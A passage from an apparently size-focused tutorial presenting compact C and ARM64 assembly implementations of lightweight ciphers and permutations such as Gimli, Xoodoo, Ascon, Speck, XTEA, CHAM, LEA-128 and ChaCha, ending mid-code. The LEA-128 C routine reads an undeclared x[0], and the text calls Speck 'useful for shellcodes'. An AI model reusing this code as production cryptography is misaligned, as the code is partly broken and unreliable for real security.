Thus far, I’ve only seen a hash function implemented with this algorithm. However, at the 2018 Advances in permutation-based cryptography, Benoît Viguier suggests using an Even-Mansour construction to implement a block cipher.

  
// Gimli in ARM64 assembly
// 152 bytes

    .arch armv8-a
    .text

    .global gimli

gimli:
    ldr    w8, =(0x9e377900 | 24)  // c = 0x9e377900 | 24; 
L0:
    mov    w7, 4                // j = 4
    mov    x1, x0               // x1 = s
L1:
    ldr    w2, [x1]             // x = R(s[j],  8);
    ror    w2, w2, 8

    ldr    w3, [x1, 16]         // y = R(s[4+j], 23);
    ror    w3, w3, 23

    ldr    w4, [x1, 32]         // z = s[8+j];

    // s[8+j] = x^(z<<1)^((y&z)<<2);
    eor    w5, w2, w4, lsl 1    // t0 = x ^ (z << 1)
    and    w6, w3, w4           // t1 = y & z
    eor    w5, w5, w6, lsl 2    // t0 = t0 ^ (t1 << 2)
    str    w5, [x1, 32]         // s[8 + j] = t0

    // s[4+j] = y^x^((x|z)<<1);
    eor    w5, w3, w2           // t0 = y ^ x
    orr    w6, w2, w4           // t1 = x | z       
    eor    w5, w5, w6, lsl 1    // t0 = t0 ^ (t1 << 1)
    str    w5, [x1, 16]         // s[4+j] = t0 

    // s[j] = z^y^((x&y)<<3);
    eor    w5, w4, w3           // t0 = z ^ y
    and    w6, w2, w3           // t1 = x & y
    eor    w5, w5, w6, lsl 3    // t0 = t0 ^ (t1 << 3)
    str    w5, [x1], 4          // s[j] = t0, s++

    subs   w7, w7, 1
    bne    L1                   // j != 0

    ldp    w1, w2, [x0]
    ldp    w3, w4, [x0, 8]

    // apply linear layer
    // t0 = (r & 3);
    ands   w5, w8, 3
    bne    L2

    // X(s[2], s[3]);
    stp    w4, w3, [x0, 8]
    // s[0] ^= (0x9e377900 | r);
    eor    w2, w2, w8
    // X(s[0], s[1]);
    stp    w2, w1, [x0]
L2:
    // if (t == 2)
    cmp    w5, 2
    bne    L3

    // X(s[0], s[2]);
    stp    w1, w2, [x0, 8]
    // X(s[1], s[3]);
    stp    w3, w4, [x0]
L3:
    sub    w8, w8, 1           // r--
    uxtb   w5, w8
    cbnz   w5, L0              // r != 0
    ret

7.4 XOODOO

A permutation function designed by the Keccak team. The cookbook includes information on implementing Authenticated Encryption (AE) and a tweakable Wide Block Cipher (WBC).

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define X(u,v)t=s[u],s[u]=s[v],s[v]=t
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void xoodoo(void*p){
  W e[4],a,b,c,t,r,i,*s=p;
  W x[12]={
    0x058,0x038,0x3c0,0x0d0,
    0x120,0x014,0x060,0x02c,
    0x380,0x0f0,0x1a0,0x012};

  for(r=0;r<12;r++){
    F(4)
      e[i]=R(s[i]^s[i+4]^s[i+8],18),
      e[i]^=R(e[i],9);
    F(12)
      s[i]^=e[(i-1)&3];
    X(7,4);X(7,5);X(7,6);
    s[0]^=x[r];
    F(4)
      a=s[i],
      b=s[i+4],
      c=R(s[i+8],21),
      s[i+8]=R((b&~a)^c,24),
      s[i+4]=R((a&~c)^b,31),
      s[i]^=c&~b;
    X(8,10);X(9,11);
  }
}

Again, this is all optimized for size rather than performance.

// Xoodoo in ARM64 assembly
// 268 bytes

    .arch armv8-a
    .text

    .global xoodoo

xoodoo:
    sub    sp, sp, 16          // allocate 16 bytes
    adr    x8, rc
    mov    w9, 12               // 12 rounds
L0:
    mov    w7, 0                // i = 0
    mov    x1, x0
L1:
    ldr    w4, [x1, 32]         // w4 = s[i+8]
    ldr    w3, [x1, 16]         // w3 = s[i+4]
    ldr    w2, [x1], 4          // w2 = s[i+0], advance x1 by 4

    // e[i] = R(s[i] ^ s[i+4] ^ s[i+8], 18);
    eor    w2, w2, w3
    eor    w2, w2, w4
    ror    w2, w2, 18

    // e[i] ^= R(e[i], 9);
    eor    w2, w2, w2, ror 9
    str    w2, [sp, x7, lsl 2]  // store in e

    add    w7, w7, 1            // i++
    cmp    w7, 4                // i < 4
    bne    L1                   //

    // s[i]^= e[(i - 1) & 3];
    mov    w7, 0                // i = 0
L2:
    sub    w2, w7, 1
    and    w2, w2, 3            // w2 = i & 3
    ldr    w2, [sp, x2, lsl 2]  // w2 = e[(i - 1) & 3]
    ldr    w3, [x0, x7, lsl 2]  // w3 = s[i]
    eor    w3, w3, w2           // w3 ^= w2 
    str    w3, [x0, x7, lsl 2]  // s[i] = w3 
    add    w7, w7, 1            // i++
    cmp    w7, 12               // i < 12
    bne    L2

    // Rho west
    // X(s[7], s[4]);
    // X(s[7], s[5]);
    // X(s[7], s[6]);
    ldp    w2, w3, [x0, 16]
    ldp    w4, w5, [x0, 24]
    stp    w5, w2, [x0, 16]
    stp    w3, w4, [x0, 24]

    // Iota
    // s[0] ^= *rc++;
    ldrh   w2, [x8], 2         // load half-word, advance by 2
    ldr    w3, [x0]            // load word
    eor    w3, w3, w2          // xor
    str    w3, [x0]            // store word

    mov    w7, 4
    mov    x1, x0
L3:
    // Chi and Rho east
    // a = s[i+0];
    ldr    w2, [x1]

    // b = s[i+4];
    ldr    w3, [x1, 16]

    // c = R(s[i+8], 21);
    ldr    w4, [x1, 32]
    ror    w4, w4, 21

    // s[i+8] = R((b & ~a) ^ c, 24);
    bic    w5, w3, w2
    eor    w5, w5, w4
    ror    w5, w5, 24
    str    w5, [x1, 32]

    // s[i+4] = R((a & ~c) ^ b, 31);
    bic    w5, w2, w4
    eor    w5, w5, w3
    ror    w5, w5, 31
    str    w5, [x1, 16]

    // s[i+0]^= c & ~b;
    bic    w5, w4, w3
    eor    w5, w5, w2
    str    w5, [x1], 4

    // i--
    subs   w7, w7, 1
    bne    L3

    // X(s[8], s[10]);
    // X(s[9], s[11]);
    ldp    w2, w3, [x0, 32] // 8, 9
    ldp    w4, w5, [x0, 40] // 10, 11
    stp    w2, w3, [x0, 40]
    stp    w4, w5, [x0, 32]

    subs   w9, w9, 1           // r--
    bne    L0                  // r != 0

    // release stack
    add    sp, sp, 16
    ret
    // round constants
rc:
    .hword 0x058, 0x038, 0x3c0, 0x0d0
    .hword 0x120, 0x014, 0x060, 0x02c
    .hword 0x380, 0x0f0, 0x1a0, 0x012

7.5 ASCON

A permutation function designed by Christoph Dobraunig, Maria Eichlseder, Florian Mendel and Martin Schläffer. Ascon uses a sponge-based mode of operation. The recommended key, tag and nonce length is 128 bits. The sponge operates on a state of 320 bits, with injected message blocks of 64 or 128 bits. The core permutation iteratively applies an SPN-based round transformation with a 5-bit S-box and a lightweight linear layer.

Ascon website

#define R(x,n)(((x)>>(n))|((x)<<(64-(n))))
typedef unsigned long long W;

void ascon(void*p) {
    int i;
    W   t0,t1,t2,t3,t4,x0,x1,x2,x3,x4,*s=(W*)p;
    
    // load 320-bit state
    x0=s[0];x1=s[1];x2=s[2];x3=s[3];x4=s[4];
    // apply 12 rounds
    for(i=0;i<12;i++) {
      // add round constant
      x2^=((0xFULL-i)<<4)|i;
      // apply non-linear layer
      x0^=x4;x4^=x3;x2^=x1;
      t4=(x0&~x4);t3=(x4&~x3);t2=(x3&~x2);t1=(x2&~x1);t0=(x1&~x0);
      x0^=t1;x1^=t2;x2^=t3;x3^=t4;x4^=t0;
      x1^=x0;x0^=x4;x3^=x2;x2=~x2;
      // apply linear diffusion layer
      x0^=R(x0,19)^R(x0,28);x1^=R(x1,61)^R(x1,39);
      x2^=R(x2,1)^R(x2,6);x3^=R(x3,10)^R(x3,17);
      x4^=R(x4,7)^R(x4,41);
    }
    // save 320-bit state
    s[0]=x0;s[1]=x1;s[2]=x2;s[3]=x3;s[4]=x4;
}

This algorithm works really well on the ARM64 architecture. Very simple operations.

  
// ASCON in ARM64 assembly
// 192 bytes

    .arch armv8-a
    .text

    .global ascon

ascon:
    mov    x10, x0
    // load 320-bit state
    ldp    x0, x1, [x10]
    ldp    x2, x3, [x10, 16]
    ldr    x4, [x10, 32]

    // apply 12 rounds
    mov    x11, xzr
L0:
    // add round constant
    // x2^=((0xFULL-i)<<4)|i;
    mov    x12, 0xF
    sub    x12, x12, x11
    orr    x12, x11, x12, lsl 4
    eor    x2, x2, x12

    // apply non-linear layer
    // x0^=x4;x4^=x3;x2^=x1;
    eor    x0, x0, x4
    eor    x4, x4, x3
    eor    x2, x2, x1

    // t4=(x0&~x4);t3=(x4&~x3);t2=(x3&~x2);t1=(x2&~x1);t0=(x1&~x0);
    bic    x5, x1, x0
    bic    x6, x2, x1
    bic    x7, x3, x2
    bic    x8, x4, x3
    bic    x9, x0, x4

    // x0^=t1;x1^=t2;x2^=t3;x3^=t4;x4^=t0;
    eor    x0, x0, x6
    eor    x1, x1, x7
    eor    x2, x2, x8
    eor    x3, x3, x9
    eor    x4, x4, x5

    // x1^=x0;x0^=x4;x3^=x2;x2=~x2;
    eor    x1, x1, x0
    eor    x0, x0, x4
    eor    x3, x3, x2
    mvn    x2, x2

    // apply linear diffusion layer
    // x0^=R(x0,19)^R(x0,28);
    ror    x5, x0, 19
    eor    x5, x5, x0, ror 28
    eor    x0, x0, x5

    // x1^=R(x1,61)^R(x1,39);
    ror    x5, x1, 61
    eor    x5, x5, x1, ror 39
    eor    x1, x1, x5

    // x2^=R(x2,1)^R(x2,6);
    ror    x5, x2, 1
    eor    x5, x5, x2, ror 6
    eor    x2, x2, x5

    // x3^=R(x3,10)^R(x3,17);
    ror    x5, x3, 10
    eor    x5, x5, x3, ror 17
    eor    x3, x3, x5

    // x4^=R(x4,7)^R(x4,41);
    ror    x5, x4, 7
    eor    x5, x5, x4, ror 41
    eor    x4, x4, x5

    // i++
    add    x11, x11, 1
    // i < 12
    cmp    x11, 12
    bne    L0

    // save 320-bit state
    stp    x0, x1, [x10]
    stp    x2, x3, [x10, 16]
    str    x4, [x10, 32]
    ret

7.6 SPECK

A block cipher from the NSA that was intended to make its way into IoT devices. Designed by Ray Beaulieu, Douglas Shors, Jason Smith, Stefan Treatman-Clark, Bryan Weeks and Louis Wingers.

The SIMON and SPECK Families of Lightweight Block Ciphers

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void speck(void*mk,void*p){
  W k[4],*x=p,i,t;
  
  F(4)k[i]=((W*)mk)[i];
  
  F(27)
    *x=(R(*x,8)+x[1])^*k,
    x[1]=R(x[1],29)^*x,
    t=k[3],
    k[3]=(R(k[1],8)+*k)^i,
    *k=R(*k,29)^k[3],
    k[1]=k[2],k[2]=t;
}

SPECK has been surrounded by controversy since the NSA proposed including it in the ISO/IEC 29192-2 portfolio, however, they are still useful for shellcodes.

// SPECK64/128 in ARM64 assembly
// 80 bytes

    .arch armv8-a
    .text

    .global speck64

    // speck64(void*mk, void*data);
speck64:
    // load 128-bit key
    // k0 = k[0]; k1 = k[1]; k2 = k[2]; k3 = k[3];
    ldp    w5, w6, [x0]
    ldp    w7, w8, [x0, 8]
    // load 64-bit plain text
    ldp    w2, w4, [x1]         // x0 = x[0]; x1 = k[1];
    mov    w3, wzr              // i=0
L0:
    ror    w2, w2, 8
    add    w2, w2, w4           // x0 = (R(x0, 8) + x1) ^ k0;
    eor    w2, w2, w5           //
    eor    w4, w2, w4, ror 29   // x1 = R(x1, 3) ^ x0;
    mov    w9, w8               // backup k3
    ror    w6, w6, 8
    add    w8, w5, w6           // k3 = (R(k1, 8) + k0) ^ i;
    eor    w8, w8, w3           //
    eor    w5, w8, w5, ror 29   // k0 = R(k0, 3) ^ k3;
    mov    w6, w7               // k1 = k2;
    mov    w7, w9               // k2 = t;
    add    w3, w3, 1            // i++;
    cmp    w3, 27               // i < 27;
    bne    L0

    // save result
    stp    w2, w4, [x1]         // x[0] = x0; x[1] = x1;
    ret

Since there isn’t a huge difference between the two variants, here’s the 128/256 version that works best on 64-bit architectures.

#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned long long W;

void speck128(void*mk,void*p){
  W k[4],*x=p,i,t;

  F(4)k[i]=((W*)mk)[i];
  
  F(34)
    x[1]=(R(x[1],8)+*x)^*k,
    *x=R(*x,61)^x[1],
    t=k[3],
    k[3]=(R(k[1],8)+*k)^i,
    *k=R(*k,61)^k[3],
    k[1]=k[2],k[2]=t;
}

Again, the assembly is almost exactly the same.

  
// SPECK128/256 in ARM64 assembly
// 80 bytes

    .arch armv8-a
    .text

    .global speck128

    // speck128(void*mk, void*data);
speck128:
    // load 256-bit key
    // k0 = k[0]; k1 = k[1]; k2 = k[2]; k3 = k[3];
    ldp    x5, x6, [x0]
    ldp    x7, x8, [x0, 16]
    // load 128-bit plain text
    ldp    x2, x4, [x1]         // x0 = x[0]; x1 = k[1];
    mov    x3, xzr              // i=0
L0:
    ror    x4, x4, 8
    add    x4, x4, x2           // x1 = (R(x1, 8) + x0) ^ k0;
    eor    x4, x4, x5           //
    eor    x2, x4, x2, ror 61   // x0 = R(x0, 61) ^ x1;
    mov    x9, x8               // backup k3
    ror    x6, x6, 8
    add    x8, x5, x6           // k3 = (R(k1, 8) + k0) ^ i;
    eor    x8, x8, x3           //
    eor    x5, x8, x5, ror 61   // k0 = R(k0, 61) ^ k3;
    mov    x6, x7               // k1 = k2;
    mov    x7, x9               // k2 = t;
    add    x3, x3, 1            // i++;
    cmp    x3, 34               // i < 34;
    bne    L0

    // save result
    stp    x2, x4, [x1]         // x[0] = x0; x[1] = x1;
    ret

The designs are nice, but independent cryptographers suggest there may be weaknesses in these ciphers that only the NSA know about.

7.7 SIMECK

A block cipher designed by Gangqiang Yang, Bo Zhu, Valentin Suder, Mark D. Aagaard, and Guang Gong was published in 2015. According to the authors, SIMECK combines the good design components of both SIMON and SPECK, in order to devise more compact and efficient block ciphers.

#define R(v,n)(((v)<<(n))|((v)>>(32-(n))))
#define X(a,b)(t)=(a),(a)=(b),(b)=(t)

void simeck(void*mk,void*p){
  unsigned int t,k0,k1,k2,k3,l,r,*k=mk,*x=p;
  unsigned long long s=0x938BCA3083F;

  k0=*k;k1=k[1];k2=k[2];k3=k[3]; 
  r=*x;l=x[1];

  do{
    r^=R(l,1)^(R(l,5)&l)^k0;
    X(l,r);
    t=(s&1)-4;
    k0^=R(k1,1)^(R(k1,5)&k1)^t;    
    X(k0,k1);X(k1,k2);X(k2,k3);
  } while(s>>=1);
  *x=r; x[1]=l;
}

I cannot say if SIMECK is more compact than SIMON in hardware. However, SPECK is clearly more compact in software.

  
// SIMECK in ARM64 assembly
// 100 bytes

    .arch armv8-a
    .text
    .global simeck

simeck:
     // unsigned long long s = 0x938BCA3083F;
     movz    x2, 0x083F
     movk    x2, 0xBCA3, lsl 16
     movk    x2, 0x0938, lsl 32

     // load 128-bit key 
     ldp     w3, w4, [x0]
     ldp     w5, w6, [x0, 8]

     // load 64-bit plaintext 
     ldp     w8, w7, [x1]
L0:
     // r ^= R(l,1) ^ (R(l,5) & l) ^ k0;
     eor     w9, w3, w7, ror 31
     and     w10, w7, w7, ror 27
     eor     w9, w9, w10
     mov     w10, w7
     eor     w7, w8, w9
     mov     w8, w10

     // t1 = (s & 1) - 4;
     // k0 ^= R(k1,1) ^ (R(k1,5) & k1) ^ t1;
     // X(k0,k1); X(k1,k2); X(k2,k3);
     eor     w3, w3, w4, ror 31
     and     w9, w4, w4, ror 27
     eor     w9, w9, w3
     mov     w3, w4
     mov     w4, w5
     mov     w5, w6
     and     x10, x2, 1
     sub     x10, x10, 4
     eor     w6, w9, w10

     // s >>= 1
     lsr     x2, x2, 1
     cbnz    x2, L0

     // save 64-bit ciphertext 
     stp     w8, w7, [x1]
     ret

7.8 CHASKEY

A block cipher designed by Nicky Mouha, Bart Mennink, Anthony Van Herrewege, Dai Watanabe, Bart Preneel and Ingrid Verbauwhede. Although Chaskey is specifically a MAC function, the underlying primitive is a block cipher. What you see below is only encryption, however, it is possible to implement an inverse function for decryption by reversing the function using rol and sub in place of ror and add.

Chaskey: An Efficient MAC Algorithm for 32-bit Microcontrollers

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
  
void chaskey(void*mk,void*p){
  unsigned int i,*x=p,*k=mk;

  F(4)x[i]^=k[i];
  F(16)
    *x+=x[1],
    x[1]=R(x[1],27)^*x,
    x[2]+=x[3],
    x[3]=R(x[3],24)^x[2],
    x[2]+=x[1],
    *x=R(*x,16)+x[3],
    x[3]=R(x[3],19)^*x,
    x[1]=R(x[1],25)^x[2],
    x[2]=R(x[2],16);
  F(4)x[i]^=k[i];
}
  
// CHASKEY in ARM64 assembly
// 112 bytes

  .arch armv8-a
  .text

  .global chaskey

  // chaskey(void*mk, void*data);
chaskey:
    // load 128-bit key
    ldp    w2, w3, [x0]
    ldp    w4, w5, [x0, 8]

    // load 128-bit plain text
    ldp    w6, w7, [x1]
    ldp    w8, w9, [x1, 8]

    // xor plaintext with key
    eor    w6, w6, w2          // x[0] ^= k[0];
    eor    w7, w7, w3          // x[1] ^= k[1];
    eor    w8, w8, w4          // x[2] ^= k[2];
    eor    w9, w9, w5          // x[3] ^= k[3];
    mov    w10, 16             // i = 16
L0:
    add    w6, w6, w7          // x[0] += x[1];
    eor    w7, w6, w7, ror 27  // x[1]=R(x[1],27) ^ x[0];
    add    w8, w8, w9          // x[2] += x[3];
    eor    w9, w8, w9, ror 24  // x[3]=R(x[3],24) ^ x[2];
    add    w8, w8, w7          // x[2] += x[1];
    ror    w6, w6, 16
    add    w6, w9, w6          // x[0]=R(x[0],16) + x[3];
    eor    w9, w6, w9, ror 19  // x[3]=R(x[3],19) ^ x[0];
    eor    w7, w8, w7, ror 25  // x[1]=R(x[1],25) ^ x[2];
    ror    w8, w8, 16          // x[2]=R(x[2],16);
    subs   w10, w10, 1         // i--
    bne    L0                  // i > 0

    // xor cipher text with key
    eor    w6, w6, w2          // x[0] ^= k[0];
    eor    w7, w7, w3          // x[1] ^= k[1];
    eor    w8, w8, w4          // x[2] ^= k[2];
    eor    w9, w9, w5          // x[3] ^= k[3];

    // save 128-bit cipher text
    stp    w6, w7, [x1]
    stp    w8, w9, [x1, 8]
    ret

7.9 XTEA

A block cipher designed by Roger Needham and David Wheeler. It was published in 1998 as a response to weaknesses found in the Tiny Encryption Algorithm (TEA). XTEA compared to its predecessor TEA contains a more complex key-schedule and rearrangement of shifts, XORs, and additions. The implementation here uses 32 rounds.

Tea Extensions

void xtea(void*mk,void*p){
  unsigned int t,r=65,s=0,*k=mk,*x=p;

  while(--r)
    t=x[1],
    x[1]=*x+=((((t<<4)^(t>>5))+t)^
    (s+k[((r&1)?s+=0x9E3779B9,
    s>>11:s)&3])),*x=t;
}

Although the round counter r is initialized to 65, it is only performing 32 rounds of encryption. If 64 rounds were required, then r should be initialized to 129 (64*2+1). Perhaps it would make more sense to allow a number of rounds as a parameter, but this is simply for illustration.

  
// XTEA in ARM64 assembly
// 92 bytes

    .arch armv8-a
    .text

    .equ ROUNDS, 32

    .global xtea

    // xtea(void*mk, void*data);
xtea:
    mov    w7, ROUNDS * 2

    // load 64-bit plain text
    ldp    w2, w4, [x1]         // x0  = x[0], x1 = x[1];
    mov    w3, wzr              // sum = 0;
    ldr    w5, =0x9E3779B9      // c   = 0x9E3779B9;
L0:
    mov    w6, w3               // t0 = sum;
    tbz    w7, 0, L1            // if ((i & 1)==0) goto L1;

    // the next 2 only execute if (i % 2) is not zero
    add    w3, w3, w5           // sum += 0x9E3779B9;
    lsr    w6, w3, 11           // t0 = sum >> 11
L1:
    and    w6, w6, 3            // t0 %= 4
    ldr    w6, [x0, x6, lsl 2]  // t0 = k[t0];
    add    w8, w3, w6           // t1 = sum + t0
    mov    w6, w4, lsl 4        // t0 = (x1 << 4)
    eor    w6, w6, w4, lsr 5    // t0^= (x1 >> 5)
    add    w6, w6, w4           // t0+= x1
    eor    w6, w6, w8           // t0^= t1
    mov    w8, w4               // backup x1
    add    w4, w6, w2           // x1 = t0 + x0

    // XCHG(x0, x1)
    mov    w2, w8               // x0 = x1
    subs   w7, w7, 1
    bne    L0                   // i > 0
    stp    w2, w4, [x1]
    ret

7.10 NOEKEON

A block cipher designed by Joan Daemen, Michaël Peeters, Gilles Van Assche and Vincent Rijmen.

Noekeon website

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))

void noekeon(void*mk,void*p){
  unsigned int a,b,c,d,t,*k=mk,*x=p;
  unsigned char rc=128;

  a=*x;b=x[1];c=x[2];d=x[3];

  for(;;) {
    a^=rc;t=a^c;t^=R(t,8)^R(t,24);
    b^=t;d^=t;a^=k[0];b^=k[1];
    c^=k[2];d^=k[3];t=b^d;
    t^=R(t,8)^R(t,24);a^=t;c^=t;
    if(rc==212)break;
    rc=((rc<<1)^((rc>>7)*27));
    b=R(b,31);c=R(c,27);d=R(d,30);
    b^=~((d)|(c));t=d;d=a^c&b;a=t;
    c^=a^b^d;b^=~((d)|(c));a^=c&b;
    b=R(b,1);c=R(c,5);d=R(d,2);
  }
  *x=a;x[1]=b;x[2]=c;x[3]=d;
}

NOEKEON can be implemented quite well for both INTEL and ARM architectures.

  
// NOEKEON in ARM64 assembly
// 212 bytes

    .arch armv8-a
    .text

    .global noekeon

noekeon:
    mov    x12, x1

    // load 128-bit key
    ldp    w4, w5, [x0]
    ldp    w6, w7, [x0, 8]

    // load 128-bit plain text
    ldp    w2, w3, [x1, 8]
    ldp    w0, w1, [x1]

    // c = 128
    mov    w8, 128
    mov    w9, 27
L0:
    // a^=rc;t=a^c;t^=R(t,8)^R(t,24);
    eor    w0, w0, w8
    eor    w10, w0, w2
    eor    w11, w10, w10, ror 8
    eor    w10, w11, w10, ror 24

    // b^=t;d^=t;a^=k[0];b^=k[1];
    eor    w1, w1, w10
    eor    w3, w3, w10
    eor    w0, w0, w4
    eor    w1, w1, w5

    // c^=k[2];d^=k[3];t=b^d;
    eor    w2, w2, w6
    eor    w3, w3, w7
    eor    w10, w1, w3

    // t^=R(t,8)^R(t,24);a^=t;c^=t;
    eor    w11, w10, w10, ror 8
    eor    w10, w11, w10, ror 24
    eor    w0, w0, w10
    eor    w2, w2, w10

    // if(rc==212)break;
    cmp    w8, 212
    beq    L1

    // rc=((rc<<1)^((rc>>7)*27));
    lsr    w10, w8, 7
    mul    w10, w10, w9
    eor    w8, w10, w8, lsl 1
    uxtb   w8, w8

    // b=R(b,31);c=R(c,27);d=R(d,30);
    ror    w1, w1, 31
    ror    w2, w2, 27
    ror    w3, w3, 30

    // b^=~(d|c);t=d;d=a^(c&b);a=t;
    orr    w10, w3, w2
    eon    w1, w1, w10
    mov    w10, w3
    and    w3, w2, w1
    eor    w3, w3, w0
    mov    w0, w10

    // c^=a^b^d;b^=~(d|c);a^=c&b;
    eor    w2, w2, w0
    eor    w2, w2, w1
    eor    w2, w2, w3
    orr    w10, w3, w2
    eon    w1, w1, w10
    and    w10, w2, w1
    eor    w0, w0, w10

    // b=R(b,1);c=R(c,5);d=R(d,2);
    ror    w1, w1, 1
    ror    w2, w2, 5
    ror    w3, w3, 2
    b      L0
L1:
    // *x=a;x[1]=b;x[2]=c;x[3]=d;
    stp    w0, w1, [x12]
    stp    w2, w3, [x12, 8]
    ret

7.11 CHAM

A block cipher designed by Bonwook Koo, Dongyoung Roh, Hyeonjin Kim, Younghoon Jung, Dong-Geon Lee, and Daesung Kwon.

CHAM: A Family of Lightweight Block Ciphers for Resource-Constrained Devices.

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void cham(void*mk,void*p){
  W rk[8],*w=p,*k=mk,i,t;

  F(4)
    t=k[i]^R(k[i],31),
    rk[i]=t^R(k[i],24),
    rk[(i+4)^1]=t^R(k[i],21);
  F(80)
    t=w[3],w[0]^=i,w[3]=rk[i&7],
    w[3]^=R(w[1],(i&1)?24:31),
    w[3]+=w[0],
    w[3]=R(w[3],(i&1)?31:24),
    w[0]=w[1],w[1]=w[2],w[2]=t;
}

This algorithm works better for 32-bit ARM where conditional execution of all instructions is supported.

  
// CHAM 128/128 in ARM64 assembly
// 160 bytes 

    .arch armv8-a
    .text
    .global cham

    // cham(void*mk,void*p);
cham:
    sub    sp, sp, 32
    mov    w2, wzr
    mov    x8, x1
L0:
    // t=k[i]^R(k[i],31),
    ldr    w5, [x0, x2, lsl 2]
    eor    w6, w5, w5, ror 31

    // rk[i]=t^R(k[i],24),
    eor    w7, w6, w5, ror 24
    str    w7, [sp, x2, lsl 2]

    // rk[(i+4)^1]=t^R(k[i],21);
    eor    w7, w6, w5, ror 21
    add    w5, w2, 4
    eor    w5, w5, 1
    str    w7, [sp, x5, lsl 2]

    // i++
    add    w2, w2, 1
    // i < 4
    cmp    w2, 4
    bne    L0

    ldp    w0, w1, [x8]
    ldp    w2, w3, [x8, 8]

    // i = 0
    mov    w4, wzr
L1:
    tst    w4, 1

    // t=w[3],w[0]^=i,w[3]=rk[i%8],
    mov    w5, w3
    eor    w0, w0, w4
    and    w6, w4, 7
    ldr    w3, [sp, x6, lsl 2]

    // w[3]^=R(w[1],(i & 1) ? 24 : 31),
    mov    w6, w1, ror 24
    mov    w7, w1, ror 31
    csel   w6, w6, w7, ne
    eor    w3, w3, w6

    // w[3]+=w[0],
    add    w3, w3, w0

    // w[3]=R(w[3],(i & 1) ? 31 : 24),
    mov    w6, w3, ror 31
    mov    w7, w3, ror 24
    csel   w3, w6, w7, ne

    // w[0]=w[1],w[1]=w[2],w[2]=t;
    mov    w0, w1
    mov    w1, w2
    mov    w2, w5

    // i++ 
    add    w4, w4, 1
    // i < 80
    cmp    w4, 80
    bne    L1

    stp    w0, w1, [x8]
    stp    w2, w3, [x8, 8]
    add    sp, sp, 32
    ret

7.12 LEA-128

A block cipher designed by Deukjo Hong, Jung-Keun Lee, Dong-Chan Kim, Daesung Kwon, Kwon Ho Ryu, and Dong-Geon Lee.

LEA: A 128-Bit Block Cipher for Fast Encryption on Common Processors

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
typedef unsigned int W;

void lea128(void*mk,void*p){
  W r,t,*w=p,*k=mk;
  W c[4]=
    {0xc3efe9db,0x88c4d604,
     0xe789f229,0xc6f98763};

  for(r=0;r<24;r++){
    t=c[r%4];
    c[r%4]=R(t,28);
    k[0]=R(k[0]+t,31);
    k[1]=R(k[1]+R(t,31),29);
    k[2]=R(k[2]+R(t,30),26);
    k[3]=R(k[3]+R(t,29),21);      
    t=x[0];
    w[0]=R((w[0]^k[0])+(w[1]^k[1]),23);
    w[1]=R((w[1]^k[2])+(w[2]^k[1]),5);
    w[2]=R((w[2]^k[3])+(w[3]^k[1]),3);
    w[3]=t;
  }
}

Everything here is very straight forward. All Add, Rotate, Xor operations.

// LEA-128/128 in ARM64 assembly
// 224 bytes

    .arch armv8-a

    // include the MOVL macro
    .include "../../include.inc"

    .text
    .global lea128

lea128:
    mov    x11, x0
    mov    x12, x1

    // allocate 16 bytes
    sub    sp, sp, 4*4

    // load immediate values
    movl   w0, 0xc3efe9db
    movl   w1, 0x88c4d604
    movl   w2, 0xe789f229
    movl   w3, 0xc6f98763

    // store on stack
    str    w0, [sp    ]
    str    w1, [sp,  4]
    str    w2, [sp,  8]
    str    w3, [sp, 12]

    // for(r=0;r<24;r++) {
    mov    w8, wzr

    // load 128-bit key
    ldp    w4, w5, [x11]
    ldp    w6, w7, [x11, 8]

    // load 128-bit plaintext
    ldp    w0, w1, [x12]
    ldp    w2, w3, [x12, 8]
L0:
    // t=c[r%4];
    and    w9, w8, 3
    ldr    w10, [sp, x9, lsl 2]

    // c[r%4]=R(t,28);
    mov    w11, w10, ror 28
    str    w11, [sp, x9, lsl 2]

    // k[0]=R(k[0]+t,31);
    add    w4, w4, w10
    ror    w4, w4, 31

    // k[1]=R(k[1]+R(t,31),29);
    ror    w11, w10, 31
    add    w5, w5, w11
    ror    w5, w5, 29

    // k[2]=R(k[2]+R(t,30),26);
    ror    w11, w10, 30
    add    w6, w6, w11
    ror    w6, w6, 26

    // k[3]=R(k[3]+R(t,29),21);
    ror    w11, w10, 29
    add    w7, w7, w11
    ror    w7, w7, 21

    // t=x[0];
    mov    w10, w0

    // w[0]=R((w[0]^k[0])+(w[1]^k[1]),23);
    eor    w0, w0, w4
    eor    w9, w1, w5
    add    w0, w0, w9
    ror    w0, w0, 23

    // w[1]=R((w[1]^k[2])+(w[2]^k[1]),5);
    eor    w1, w1, w6
    eor    w9, w2, w5
    add    w1, w1, w9
    ror    w1, w1, 5

    // w[2]=R((w[2]^k[3])+(w[3]^k[1]),3);
    eor    w2, w2, w7
    eor    w3, w3, w5
    add    w2, w2, w3
    ror    w2, w2, 3

    // w[3]=t;
    mov    w3, w10

    // r++
    add    w8, w8, 1
    // r < 24
    cmp    w8, 24
    bne    L0

    // save 128-bit ciphertext
    stp    w0, w1, [x12]
    stp    w2, w3, [x12, 8]

    add    sp, sp, 4*4
    ret

7.13 CHACHA

A stream cipher designed by Daniel Bernstein and published in 2008. This along with Poly1305 for authentication has become a drop in replacement on handheld devices for AES-128-GCM where AES native instructions are unavailable. The version implemented here is based on a description provided in RFC8439 that uses a 256-bit key, a 32-bit counter and 96-bit nonce.

The ChaCha family of stream ciphers.

ChaCha20 and Poly1305 for IETF Protocols

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
#define X(a,b)(t)=(a),(a)=(b),(b)=(t)
typedef unsigned int W;

void P(W*s,W*x){
    W a,b,c,d,i,t,r;
    W v[8]={0xC840,0xD951,0xEA62,0xFB73,
            0xFA50,0xCB61,0xD872,0xE943};
            
    F(16)x[i]=s[i];
    
    F(80) {
      d=v[i%8];
      a=(d&15);b=(d>>4&15);
      c=(d>>8&15);d>>=12;
      
      for(r=0x19181410;r;r>>=8)
        x[a]+=x[b],
        x[d]=R(x[d]^x[a],(r&255)),
